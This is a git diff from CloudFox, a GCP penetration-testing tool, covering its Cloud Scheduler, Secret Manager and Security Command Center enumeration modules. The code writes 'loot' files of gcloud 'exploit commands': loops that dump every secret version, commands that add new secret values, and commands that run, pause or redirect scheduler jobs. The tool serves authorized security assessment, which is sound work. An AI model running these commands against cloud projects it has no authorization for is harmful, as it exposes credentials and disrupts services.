globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d job(s) in project %s", len(jobs), projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SchedulerModule) addJobToLoot(projectID string, job SchedulerService.JobInfo) { + lootFile := m.LootMap[projectID]["scheduler-commands"] + if lootFile == nil { + return + } + + target := formatTargetFull(job) + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SCHEDULER JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + 
"# State: %s\n"+ + "# Schedule: %s (%s)\n"+ + "# Target: %s -> %s\n", + job.Name, + job.ProjectID, job.Location, + job.State, + job.Schedule, job.TimeZone, + job.TargetType, target, + ) + + if job.ServiceAccount != "" { + lootFile.Contents += fmt.Sprintf( + "# Service Account: %s\n", + job.ServiceAccount, + ) + } + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe job:\n"+ + "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Run job immediately:\n"+ + "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ + "# Pause job:\n"+ + "gcloud scheduler jobs pause %s --location=%s --project=%s\n\n", + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + ) + + if job.TargetType == "http" { + lootFile.Contents += fmt.Sprintf( + "# Update HTTP target (requires cloudscheduler.jobs.update):\n"+ + "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"NEW_URL\"\n\n", + job.Name, job.Location, job.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for the jobs table +func (m *SchedulerModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Job Name", + "Location", + "State", + "Schedule", + "Target Type", + "Target", + "Service Account", + "SA Attack Paths", + "Last Run", + } +} + +// jobsToTableBody converts jobs to table body rows +func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]string { + var body [][]string + for _, job := range jobs { + // Format target - full, no truncation + target := 
formatTargetFull(job) + + // Format service account - full, no truncation + sa := "-" + if job.ServiceAccount != "" { + sa = job.ServiceAccount + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + // Format last run + lastRun := "-" + if job.LastAttemptTime != "" { + lastRun = job.LastAttemptTime + if job.Status != "" && job.Status != "OK" { + lastRun += " (FAILED)" + } + } + + body = append(body, []string{ + m.GetProjectName(job.ProjectID), + job.ProjectID, + job.Name, + job.Location, + job.State, + job.Schedule, + job.TargetType, + target, + sa, + attackPaths, + lastRun, + }) + } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SchedulerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, jobs := range m.ProjectJobs { + body := m.jobsToTableBody(jobs) + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SchedulerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, 
+ m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SchedulerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allJobs := m.getAllJobs() + body := m.jobsToTableBody(allJobs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build table files + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }} + + output := SchedulerOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatTargetFull formats the job target for display without truncation +func formatTargetFull(job SchedulerService.JobInfo) string { + switch job.TargetType { + case "http": + return job.TargetURI + case "pubsub": + return job.TargetTopic + case "appengine": + target := job.TargetService + if job.TargetVersion != "" { + target += "/" + job.TargetVersion + } + if job.TargetURI != "" { + target += job.TargetURI + } + if target == "" { + return "-" + } + return target + default: + return "-" + } +} diff 
--git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index f5c691c2..94aa29c9 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -1,120 +1,502 @@ package commands import ( + "context" "fmt" + "strings" + "sync" secretmanager "cloud.google.com/go/secretmanager/apiv1" SecretsService "github.com/BishopFox/cloudfox/gcp/services/secretsService" + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPSecretsCommand = &cobra.Command{ Use: globals.GCP_SECRETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP secrets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available secrets information: -cloudfox gcp secrets`, + Aliases: []string{"secretmanager", "sm"}, + Short: "Enumerate GCP Secret Manager secrets with security configuration", + Long: `Enumerate GCP Secret Manager secrets across projects with security-relevant details. 
+ +Features: +- Lists all secrets with metadata and security configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows replication configuration (automatic vs user-managed) +- Shows expiration and rotation settings +- Enumerates IAM policies per secret +- Generates gcloud commands for secret access +- Generates exploitation commands for secret extraction + +Security Columns: +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Replication: "automatic" or "user-managed" with locations +- Rotation: Whether automatic rotation is enabled +- Expiration: Whether the secret has an expiration time/TTL +- VersionDestroyTTL: Delayed destruction period for old versions + +Resource IAM Columns: +- IAM Binding Role: The IAM role granted ON this secret (e.g., roles/secretmanager.secretAccessor) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this secret`, Run: runGCPSecretsCommand, } -// GCPSecretsResults struct that implements the internal.OutputInterface -type GCPSecretsResults struct { - Data []SecretsService.SecretInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type SecretsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + client *secretmanager.Client + mu sync.Mutex } -func (g GCPSecretsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type SecretsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - header := []string{ - "Name", - "CreationTime", - "Labels", - 
"Rotation", - "ProjectID", - // Add more fields as necessary +func (o SecretsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecretsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecretsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SECRETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, value := range g.Data { - body = append(body, []string{ - value.Name, - value.CreationTime, - fmt.Sprintf("%v", value.Labels), - value.Rotation, - value.ProjectID, - }) + // Create Secret Manager client + client, err := secretmanager.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Secret Manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + return } + defer client.Close() - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_SECRETS_MODULE_NAME, + // Create module instance + module := &SecretsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSecrets: make(map[string][]SecretsService.SecretInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + client: client, } - tableFiles = append(tableFiles, tableFile) - return tableFiles + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } -func (g GCPSecretsResults) LootFiles() []internal.LootFile { - // Define any specific data considered as loot - return []internal.LootFile{} +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() 
{ + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_SECRETS_MODULE_NAME) + } + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) + + // Get all secrets for stats + allSecrets := m.getAllSecrets() + if len(allSecrets) == 0 { + logger.InfoM("No secrets found", globals.GCP_SECRETS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(allSecrets)), globals.GCP_SECRETS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) } -func runGCPSecretsCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_SECRETS_MODULE_NAME) +// getAllSecrets returns all secrets from all projects (for statistics) +func (m *SecretsModule) getAllSecrets() []SecretsService.SecretInfo { + var all []SecretsService.SecretInfo + for _, secrets := range m.ProjectSecrets { + all = append(all, secrets...) 
+ } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *SecretsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating secrets in project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) + } + + // Create service and fetch secrets + ss := SecretsService.New(m.client) + secrets, err := ss.Secrets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SECRETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate secrets in project %s", projectID)) return } - if value, ok := ctx.Value("account").(string); ok { - account = value + // Thread-safe store per-project + m.mu.Lock() + m.ProjectSecrets[projectID] = secrets + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["secrets-commands"] = &internal.LootFile{ + Name: "secrets-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + // Generate loot for each secret + for _, secret := range secrets { + m.addSecretToLoot(projectID, secret) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d secret(s) in project %s", len(secrets), projectID), globals.GCP_SECRETS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecretsModule) addSecretToLoot(projectID string, secret SecretsService.SecretInfo) { + lootFile := m.LootMap[projectID]["secrets-commands"] + if lootFile == nil { + return + } + + // Extract secret name from full path + secretName := getSecretShortName(secret.Name) + + lootFile.Contents += fmt.Sprintf( 
+ "# =============================================================================\n"+ + "# SECRET: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# Encryption: %s, Replication: %s, Rotation: %s\n"+ + "# Created: %s\n", + secretName, secret.ProjectID, + secret.EncryptionType, secret.ReplicationType, secret.Rotation, + secret.CreationTime, + ) + + // KMS key info + if secret.KMSKeyName != "" { + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) + } + + // Rotation info + if secret.Rotation == "enabled" { + if secret.RotationPeriod != "" { + lootFile.Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) + } + if secret.NextRotationTime != "" { + lootFile.Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) + } + } + + // IAM bindings + if len(secret.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range secret.IAMBindings { + lootFile.Contents += fmt.Sprintf( + "# %s: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) + } + } + + // Commands + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe secret:\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "# List versions:\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Access latest version:\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n"+ + "# Download all versions:\n"+ + "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ + " echo \"=== Version $v ===\"\n"+ + " gcloud secrets versions access $v --secret=%s --project=%s\n"+ + "done\n"+ + "# Add a new version:\n"+ + "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", + secretName, secret.ProjectID, + secretName, secret.ProjectID, 
+ secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) +} + + +// ------------------------------ +// Helper functions +// ------------------------------ + +// getSecretShortName extracts the short name from a full secret resource path +func getSecretShortName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SecretsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, secrets := range m.ProjectSecrets { + body := m.secretsToTableBody(secrets) + tables := []internal.TableFile{{ + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + 
outputData.ProjectLevelData[projectID] = SecretsOutput{Table: tables, Loot: lootFiles} } - client, err := secretmanager.NewClient(ctx) + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ } - defer client.Close() +} - ss := SecretsService.New(client) - var results []SecretsService.SecretInfo - - // Set output params from parentCmd - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - result, err := ss.Secrets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SecretsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allSecrets := m.getAllSecrets() + body := m.secretsToTableBody(allSecrets) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - results = append(results, result...) 
- logger.InfoM(fmt.Sprintf("Done retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - cloudfoxOutput := GCPSecretsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_SECRETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }} + + output := SecretsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the secrets table header +func (m *SecretsModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Encryption", + "KMS Key", + "Replication", + "Rotation", + "Rotation Period", + "Next Rotation", + "Expiration", + "Destroy TTL", + "Created", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + "Principal Attack Paths", + } +} + +// secretsToTableBody converts secrets to table body rows +func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) [][]string { + var body [][]string + for _, secret := range secrets { + secretName := getSecretShortName(secret.Name) + + // Format expiration + expiration := "-" + if secret.HasExpiration { + if secret.ExpireTime != "" { + expiration = 
secret.ExpireTime + } else if secret.TTL != "" { + expiration = "TTL: " + secret.TTL + } + } + + // Format version destroy TTL + destroyTTL := "-" + if secret.VersionDestroyTTL != "" { + destroyTTL = secret.VersionDestroyTTL + } + + // Format KMS key (no truncation) + kmsKey := "-" + if secret.KMSKeyName != "" { + kmsKey = secret.KMSKeyName + } + + // Format rotation period + rotationPeriod := "-" + if secret.RotationPeriod != "" { + rotationPeriod = secret.RotationPeriod + } + + // Format next rotation + nextRotation := "-" + if secret.NextRotationTime != "" { + nextRotation = secret.NextRotationTime + } + + // One row per IAM member + if len(secret.IAMBindings) > 0 { + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + memberType := shared.GetPrincipalType(member) + + // Check attack paths for service account principals + attackPaths := "-" + if memberType == "ServiceAccount" { + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, email) + } + + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + binding.Role, + memberType, + member, + attackPaths, + }) + } + } + } else { + // Secret with no IAM bindings + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + "-", + "-", + "-", + "-", + }) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_SECRETS_MODULE_NAME) } + return body } diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go new 
file mode 100644 index 00000000..fbd46b61 --- /dev/null +++ b/gcp/commands/securitycenter.go @@ -0,0 +1,685 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" + +var GCPSecurityCenterCommand = &cobra.Command{ + Use: GCP_SECURITYCENTER_MODULE_NAME, + Aliases: []string{"scc", "security", "defender"}, + Hidden: true, + Short: "Enumerate Security Command Center findings and recommendations", + Long: `Enumerate Security Command Center (SCC) findings, assets, and security recommendations. + +Features: +- Lists all active SCC findings by severity (CRITICAL, HIGH, MEDIUM, LOW) +- Shows vulnerable assets and their security issues +- Identifies security posture gaps +- Provides remediation recommendations +- Generates exploitation commands for penetration testing + +Requires Security Command Center API to be enabled and appropriate IAM permissions: +- roles/securitycenter.findingsViewer or roles/securitycenter.admin`, + Run: runGCPSecurityCenterCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type SCCFinding struct { + Name string + Category string + Severity string + State string + ResourceName string + ResourceType string + ProjectID string + Description string + CreateTime string + SourceDisplayName string + ExternalURI string +} + +type SCCAsset struct { + Name string + ResourceName string + ResourceType string + ProjectID string + FindingCount int + Severity string // Highest severity finding +} + +type SCCSource struct { + Name string + DisplayName string + 
Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SecurityCenterModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ProjectFindings map[string][]SCCFinding + ProjectAssets map[string]map[string]*SCCAsset // projectID -> (resourceName -> SCCAsset) + Sources []SCCSource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex + OrgID string + UseOrgLevel bool +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SecurityCenterOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SecurityCenterOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecurityCenterOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecurityCenterCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_SECURITYCENTER_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &SecurityCenterModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectFindings: make(map[string][]SCCFinding), + ProjectAssets: make(map[string]map[string]*SCCAsset), + Sources: []SCCSource{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating Security Command Center findings...", GCP_SECURITYCENTER_MODULE_NAME) + + // Create Security Command Center client + client, err := securitycenter.NewClient(ctx) + if err != nil { + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + 
gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, "Failed to create client") + return + } + defer client.Close() + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, client, logger) + } + + // Check results + allFindings := m.getAllFindings() + if len(allFindings) == 0 { + logger.InfoM("No Security Command Center findings found", GCP_SECURITYCENTER_MODULE_NAME) + logger.InfoM("This could mean: (1) SCC is not enabled, (2) No findings exist, or (3) Insufficient permissions", GCP_SECURITYCENTER_MODULE_NAME) + return + } + + // Count findings by severity + criticalCount := 0 + highCount := 0 + mediumCount := 0 + lowCount := 0 + for _, f := range allFindings { + switch f.Severity { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + case "MEDIUM": + mediumCount++ + case "LOW": + lowCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d SCC finding(s): %d CRITICAL, %d HIGH, %d MEDIUM, %d LOW", + len(allFindings), criticalCount, highCount, mediumCount, lowCount), GCP_SECURITYCENTER_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllFindings aggregates all findings across projects +func (m *SecurityCenterModule) getAllFindings() []SCCFinding { + var allFindings []SCCFinding + for _, findings := range m.ProjectFindings { + allFindings = append(allFindings, findings...) 
+ } + return allFindings +} + +// getAllAssets aggregates all assets across projects +func (m *SecurityCenterModule) getAllAssets() map[string]*SCCAsset { + allAssets := make(map[string]*SCCAsset) + for _, projectAssets := range m.ProjectAssets { + for resourceName, asset := range projectAssets { + allAssets[resourceName] = asset + } + } + return allAssets +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SecurityCenterModule) processProject(ctx context.Context, projectID string, client *securitycenter.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating SCC findings for project: %s", projectID), GCP_SECURITYCENTER_MODULE_NAME) + } + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["security-center-commands"] = &internal.LootFile{ + Name: "security-center-commands", + Contents: "# Security Command Center Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + if m.ProjectAssets[projectID] == nil { + m.ProjectAssets[projectID] = make(map[string]*SCCAsset) + } + m.mu.Unlock() + + // List active findings for this project + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + // Create request to list findings + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, // Only active findings + } + + it := client.ListFindings(ctx, req) + + findingsCount := 0 + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, + fmt.Sprintf("Project %s", projectID)) + break + } + + finding := result.Finding + if 
finding == nil { + continue + } + + // Parse the finding + sccFinding := m.parseFinding(finding, projectID) + + m.mu.Lock() + m.ProjectFindings[projectID] = append(m.ProjectFindings[projectID], sccFinding) + + // Track affected assets + if sccFinding.ResourceName != "" { + if asset, exists := m.ProjectAssets[projectID][sccFinding.ResourceName]; exists { + asset.FindingCount++ + // Update to highest severity + if severityRank(sccFinding.Severity) > severityRank(asset.Severity) { + asset.Severity = sccFinding.Severity + } + } else { + m.ProjectAssets[projectID][sccFinding.ResourceName] = &SCCAsset{ + Name: sccFinding.ResourceName, + ResourceName: sccFinding.ResourceName, + ResourceType: sccFinding.ResourceType, + ProjectID: projectID, + FindingCount: 1, + Severity: sccFinding.Severity, + } + } + } + + // Add to loot files + m.addFindingToLoot(sccFinding, projectID) + m.mu.Unlock() + + findingsCount++ + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d finding(s) in project %s", findingsCount, projectID), GCP_SECURITYCENTER_MODULE_NAME) + } +} + +// parseFinding converts an SCC finding to our internal structure +func (m *SecurityCenterModule) parseFinding(finding *securitycenterpb.Finding, projectID string) SCCFinding { + sccFinding := SCCFinding{ + Name: finding.Name, + Category: finding.Category, + State: finding.State.String(), + ProjectID: projectID, + ResourceName: 